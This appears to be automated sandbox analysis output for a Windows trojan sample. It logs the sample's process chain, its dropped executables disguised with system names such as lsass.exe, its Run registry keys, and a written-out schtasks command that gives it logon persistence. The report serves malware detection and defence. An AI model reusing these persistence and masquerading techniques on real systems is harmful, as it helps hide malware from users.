Source: unknown	Process created: C:\Users\user\Pictures\Camera Roll\lsass.exe "C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe"
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\refhostperfdllCommon\rSX3yp.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process created: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe "C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe"	Jump to behavior

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\refhostperfdllCommonsessionnetsvc.exe.log

Jump to behavior

Source: classification engine

Classification label: mal92.troj.winEXE@18/12@0/1

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Code function: 0_2_01006EC9 GetLastError,FormatMessageW,

0_2_01006EC9

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Mutant created: \Sessions\1\BaseNamedObjects\3c2a2cbcf247c3c8a64f86b3e45480d00bfbb70f
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_01

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Code function: 0_2_01019E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_01019E1C

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Command line argument: sfxname	0_2_0101D5D4
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Command line argument: sfxstime	0_2_0101D5D4
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Command line argument: STARTDLG	0_2_0101D5D4

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\refhostperfdllCommon\rSX3yp.bat" "

Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Static file information: File size 1322142 > 1048576

Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0101E28C push eax; ret		0_2_0101E2AA
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Code function: 0_2_0101ED46 push ecx; ret		0_2_0101ED59

Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

File created: C:\refhostperfdllCommon\__tmp_rar_sfx_access_check_6179171

Jump to behavior

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files with benign system names

Show sources

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe

File created: C:\Users\user\Pictures\Camera Roll\lsass.exe

Jump to dropped file

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	File created: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Jump to dropped file
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	File created: C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	File created: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Jump to dropped file
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	File created: C:\Users\user\Pictures\Camera Roll\lsass.exe	Jump to dropped file

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe

File created: C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe

Jump to dropped file

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows

Show sources

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe

Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost

Jump to behavior

Creates multiple autostart registry keys

Show sources

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wjIuhVBtfHXnMCZlWDoj	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsass	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wjIuhVBtfHXnMCZlWDoj" /sc ONLOGON /tr "'C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe'" /rl HIGHEST /f

Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wjIuhVBtfHXnMCZlWDoj	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wjIuhVBtfHXnMCZlWDoj	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsass	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsass	Jump to behavior

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Camera Roll\lsass.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
